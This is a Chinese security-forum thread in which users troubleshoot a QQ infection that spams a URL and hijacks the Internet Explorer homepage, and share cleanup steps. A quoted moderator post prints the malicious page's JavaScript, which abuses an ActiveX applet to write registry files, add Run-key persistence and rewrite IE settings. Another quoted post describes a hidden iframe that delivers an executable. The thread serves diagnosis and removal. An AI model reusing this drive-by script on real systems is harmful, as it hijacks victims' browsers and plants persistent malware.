论坛: 菜鸟乐园 标题: QQ,乱发网址怎么解除啊? 复制本贴地址    
作者: guangtian [guangtian]    论坛用户   登录
我QQ在别的网友给我发了一个网址后,也乱发网址,www.qq3344.com。
我看了,在QQ的目录下生成了一个DLG.O文件,用记事本和windows自带的编辑器都打不开。
重新安装QQ问题依然存在,请高手指点!~~~谢谢~~~~~~~

地主 发表时间: 09/17 08:31

回复: rrrihc [rrrihc]   论坛用户   登录
  把QQ的那个文件给删除了应该可以了

B1层 发表时间: 09/17 09:19

回复: guangtian [guangtian]   论坛用户   登录
不是啊,我也删过那个文件。但是,涛声依旧~~~~~~~~

B2层 发表时间: 09/17 09:35

回复: guangtian [guangtian]   论坛用户   登录
对了,IE的主页也被自动设置为WWW.QQ3344.COM。而且在注册表里也找不到这个网址的。 谢谢,在线等消息啊~~~~~~~


[此贴被 guangtian(guangtian) 在 09月17日09时28分 编辑过]

B3层 发表时间: 09/17 09:37

回复: 286 [unique]   版主   登录
把QQ重装一下看效果如何?


B4层 发表时间: 09/17 09:51

回复: guangtian [guangtian]   论坛用户   登录
重装过啊,不好使啊~~

B5层 发表时间: 09/17 10:22

回复: csgh [csgh]   论坛用户   登录
其实你只要打开任务管理器你就可以看到他的进程,结束进程,然后在注册表启动项去掉相关项,再删除相关内容就可。

B6层 发表时间: 09/17 10:41

回复: guangtian [guangtian]   论坛用户   登录
我在系统配置使用程序中找到个自动执行的文件,它在c:\windows\msfiles.exe
估计是个木马程序

B7层 发表时间: 09/17 11:10

回复: shineboy [shineboy]   论坛用户   登录
我也有过和你一样的现象。。我也不知道怎么半。
我最后就是用系统还原了!!咳``好笨的方法哦


B8层 发表时间: 09/17 11:26

回复: guangtian [guangtian]   论坛用户   登录
进程管理器里出来个JAVAW的进程,估计是木马。
在启动里出来个msfiles.exe自动运行文件,在c:\windows下。
主页自动被修改成WWW。QQ3344。COM
结束JAVAW进程,在windows下删除msfiles.exe文件,重置主页,依然没有改观,我决定重装IE .但是,估计要是在注册表里找不到这个木马的键值好象重装IE也没有办法,唉~~~~~~哪位高手指点一下啊~~~~我在病毒专区看到了一个版主的解决办法,但是无效。


B9层 发表时间: 09/17 12:04

回复: myback [georgeju]   论坛用户   登录
病毒专区里有~~~

至顶的!!

http://www.20cn.net/cgi-bin/club/show.pl?key=iebEKGuBCqRP&cat=security&forum=virus&page=1&position=1216&id=1052058131



引用:
标题: 关于近来“qq自动回复加上小尾巴”的解决方案!! 返回

  作者: CyberSpy [cyberspy]    版主 
关于“qq自动回复加上小尾巴!!”

  近来众多网友反映qq回复时自动被加上了一些小尾巴,甚是烦人。究其原因:网页恶意代码。一些网站为了达到宣传自己、盗取qq等密码等等的可恶目的,太阴毒了!真心希望他们的无耻行为受到法律的制裁!(我没有做梦吧~)

  对于http://www.QQ168.net,由于我是ie6.0,所以没有能中招(本想以身试毒,看看个究竟的,但是天妒英才,哎 ~#¥#¥~),因此本文中的情况皆为根据以往经验虚拟出来的,也许会跟您的遭遇有很多出入,但是原理相通,希望能抛砖引玉,大家最后“高高兴兴上20cn来,快快乐乐杀毒去”。另幸好本版先前“马大哈”同志给出了一帖那个恶意网站的一部分vb脚本源代码对于ie恶意修改还是有所了解。

大概病毒行为:
(1)初始状况会在%windir%\system32\或者%\system\目录下生成一些乱七遭八的木马文件!可能是exe、dll为文件后缀。应该是偷qq密码的,已经中招的,请一定注意自己的qq密码哦,最好马上修改。
(2)修改注册表,增加开机启动项目,使木马服务器端一开机就运行
在注册表中添加HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\等以run开头的项目中,内容为:%windir%\system32\具体文件这里说不准!
    可能修改exe文件、txt文件和com文件等的默认打开方式(即文件关联,你一运行exe文件、txt文件或者com文件木马就被执行一次):将HKEY_CLASSES_ROOT\comfile\shell\open\command的内容修改为了%windir%\System32\具体文件这里说不准 %1 %*。将HKEY_CLASSES_ROOT\txtfile\shell\open\command的内容修改为了%windir%\System32\具体文件这里说不准 %1 %*。将HKEY_CLASSES_ROOT\exefile\shell\open\command的内容修改为%windir%\System32\具体文件这里说不准 %1 %*。
(3)恶意修改ie的一些选项,具体的情况请参照本版置顶帖“恶意代码全攻略终结篇”。


手工清除方法:
1、运行注册表编辑器(regedit)。
2、用系统自带的任务管理器或者进程管理软件停掉可疑的进程。
3、修改HKEY_CLASSES_ROOT\comfile\shell\open\command和HKEY_CLASSES_ROOT\exefile\shell\open\command为"%1" %*,删掉HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run等run开头的项,右边可疑项目。或者运行msconfig->启动->去掉可疑项目。
4、删掉%windir%\system32\中上面发现的可疑文件。

  如果您是新手,对自己的行为不是很有信心,清除过程中可以利用一下:超级兔子魔法设置或者windows优化大师等系统工具。

另外:推荐使用http://www.20cn.org/download/Defend/navce8chs.rar 诺顿杀毒软件,可以在线升级病毒库。
请升级ie或者到微软下载补丁

  具体大概QQ情缘音乐世界,http://www.QQ168.net这个可恶的小尾巴中:
c:\windows\system\systel.dll、c:\windows\system.dll (注意路径和文件名)这两个为恶意vbs脚本文件,不是系统动态链接库。他们修改通过恶意修改注册表达到系统启动便自行修改ie项目的目的,可以删除掉。具体的情况请参照本版置顶帖“恶意代码全攻略终结篇”。其他的,木马文件在哪里是什么我不清楚,十分十分抱歉!

PS:www.qq168.net一部分修改ie的恶意代码
<html><script language="">
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent.class></APPLET>");
function runcmd() 

a=document.applets[0]; 
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}'); 
a.createInstance(); 
Shl=a.GetObject(); 
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}'); 
a.createInstance(); 
fso=a.GetObject(); 
var wf1=fso.CreateTextFile("c:\\windows\\system\\systel.dll",true); 
wf1.writeLine('REGEDIT4');
wf1.WriteBlankLines(1); 
wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Start Page"="http://www.qq168.net"'); 
wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); 
wf1.WriteLine('"Local Page"="http://www.qq168.net"'); 
wf1.WriteBlankLines(1); 
wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); 
wf1.WriteBlankLines(1); 
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Start Page"="http://www.qq168.net"'); 
wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); 
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); 
wf1.WriteLine('"Local Page"="http://www.qq168.net"'); 
wf1.WriteBlankLines(1);
wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]'); 
wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]'); 
wf1.WriteLine('"Start Page"="regedit -s c:\\windows\\system\\systel.dll"'); 
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Start Page"="http://www.qq168.net"'); 
wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); 
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); 
wf1.WriteLine('"Local Page"="http://www.qq168.net"');
wf1.Close();

var wf1=fso.CreateTextFile("c:\\windows\\system.dll",true); 
wf1.writeLine('REGEDIT4');
wf1.WriteBlankLines(1); 
wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Start Page"="http://www.qq168.net"'); 
wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); 
wf1.WriteLine('"Local Page"="http://www.qq168.net"'); 
wf1.WriteBlankLines(1); 
wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); 
wf1.WriteBlankLines(1); 
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); 
wf1.WriteLine('"Start Page"="http://www.qq168.net"'); 
wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); 
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); 
wf1.WriteLine('"Local Page"="http://www.qq168.net"'); 
wf1.WriteBlankLines(1);
wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]'); 
wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"');
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]'); 
wf1.WriteLine('"win"="regedit -s c:\\\\windows\\\\system\\\\systel.dll"');     
wf1.WriteBlankLines(1);
wf1.WriteLine('rcx');
wf1.Close();

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "regedit -s c:\\windows\\system\\systel.dll");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Start Pagewin", "regedit -s c:\\windows\\system\\systel.dll");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win1", "regedit -s c:\\windows\\system.dll");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net"); 
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net");
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\First Home Page", "http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\☆♀精彩网站♀☆\\", "http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\�t☆顶级DJ舞曲☆�s\\", "http://www.qq168.net");

setTimeout('runcmd()',1000);
</script>


========================================
为了爱而爱的是神,为了被爱而爱的是人。
      #WhiteHat Hacker#----CHO(不是我,但我将是^_^)
========================================
20CN是民间非盈利网络安全组织
20CN的建设需要你的参与,按此可为网站更新文档
发表时间: 05/04 22:22

--------------------------------------------------------------------------------
  回复: NetDemon [netdemon]    Admin 
作者: TomyChen [quest]

做的一个分析是从另外一个类似于这种恶意网站上的代码分析而来的
  <iframe src=http://www.fucking.com/fuckguy/fucking.mht width=0 height=0></iframe>
  问题就出在这个fucking.mht下。(IE可以将HTML页面,包括内链的图片,保存为单个的mht文件。mht文件遵循MIME标准,包括IE,Outlook在内的许多软件可以直接打开。)由于用了iframe可能是做为隐藏标记(事实上,我没登陆该网站。公司不让上,我只能搞个小软件把代码给down下来的)。这样登陆的时候就会神不知鬼不觉的下载了fucking.mht文件。我把这个mht文件下载后以editplues(或者你可以用notepad打开)。你会发现系统要你下载一个软件。(也许存在IE版本的问题,可能老版本会不提示,或者是下载到本地后才会提示,具体原因这里不做深研了。有兴趣的可以自行研究,到时别忘了把你的成果post一份给我:D)而正是这个.exe程序在你的系统里做乱。至今为止还没有一家防病毒公司给可以清除这一病毒。(估计快了)给大家的建议是将IE升级到6.0。有事没事别到一些乱七八糟的网上跑。再给大家提个醒。类似于什么qq啊什么sex18/16有这类关键字的域名,还是少上为妙。该干嘛的干嘛去,少去一些无聊的网站省点心。好了,我也不知道还有什么要分析的啦。大家将就着防着点吧。公司做了一些限制,分析也不便。
  
  鄙视这种卖弄技术的电脑败类!一切的!
  由于本人实在看不习惯该网站的作风故把该站域名丑化。而且我也不想大家不小心跑到那个该死的站去...






[此贴被 myback(georgeju) 在 09月17日12时08分 编辑过]

B10层 发表时间: 09/17 12:40

回复: guangtian [guangtian]   论坛用户   登录
病毒专区那个文章看到了,也试过了,但是不好使,可能是我还没找到网页里附带的木马吧。这个木马跟着机器的启动自动运行,不删掉它,我看什么都白费。对了那个网站叫下载的两个文件是wbk7071.TMP和wbkB304.TMP


[此贴被 guangtian(guangtian) 在 09月17日13时23分 编辑过]

B11层 发表时间: 09/17 13:05

回复: wsmat [wsmat]   论坛用户   登录
这个问题我遇见过。把原来的QQ文件夹删除。在下载一个绿色的QQ就OK了



B12层 发表时间: 09/17 18:19

回复: newzwmail [newzwmail]   论坛用户   登录
我也遇到这样的问题,我现在正头疼,不知好如何是好啊?

B13层 发表时间: 09/19 23:30

回复: zxh52 [zxh52]   论坛用户   登录
ni中了“爱情森林:了去各大杀毒网站去杀一下吧

B14层 发表时间: 09/20 18:44

回复: zhangyanbo [zhangyanbo]   论坛用户   登录
真佩服那些写病毒的人啊,在一条1kb左右的空间里竞可以写成这么精悍的程序,厉害啊.

B15层 发表时间: 09/21 17:22

回复: vincenthm [vincenthm]   论坛用户   登录
发http:\\www.qq334.com的是qq连发器,一个病毒。
9月号的《黑防》上有讲的。

B16层 发表时间: 09/21 19:19

回复: hill [wzshb]   论坛用户   登录
有没有一个很好的解决办法!急急急急急急急急。。。。。。。。。。。。。

B17层 发表时间: 09/21 20:23

回复: hill [wzshb]   论坛用户   登录
安装了绿色QQ还是如此!哎。。。。。。。。。。。。。

B18层 发表时间: 09/21 21:29

回复: guangtian [guangtian]   论坛用户   登录
呵呵~~~这个问题经过我多天的研究已经解决了,告诉一下我的方法给大家参考~~
重启,点F8,然后选3进入安全模式。
点开始→运行,在运行里输入msconfig然后确定,进入系统配置实用程序,点启动把intnets  sysinfer  run前面的对号去掉,然后确定,提示重启,点否,暂时先不重启。
点开始→查找→文件或文件夹,在名称里依次添入intnets,sysinfer,win.ini,msfiles  ,4个文件分别查找,找到后删除。最后修改一下主页,在桌面开到Internet Explorer的图标点右键,点属性在Internet 属性里,第一个常规,在主页中的,点使用空白页。然后点确定。
把QQ也删掉重装一个。OK了,重启吧。:)
对了,为了防止以后这样的事发生,建议把IE升级到6.0。就是去微软中国的网站按照提示下载安装IE6.0。


B19层 发表时间: 09/22 10:01

回复: newzwmail [newzwmail]   论坛用户   登录
我的是windows 2000,没有那个msconfig,怎么办啊

B20层 发表时间: 09/22 18:38

回复: hill [wzshb]   论坛用户   登录
现在还没有解决问题朋友们请到http://www.hackbase.com下载QQAV2.0吧!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

B21层 发表时间: 09/25 12:34

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号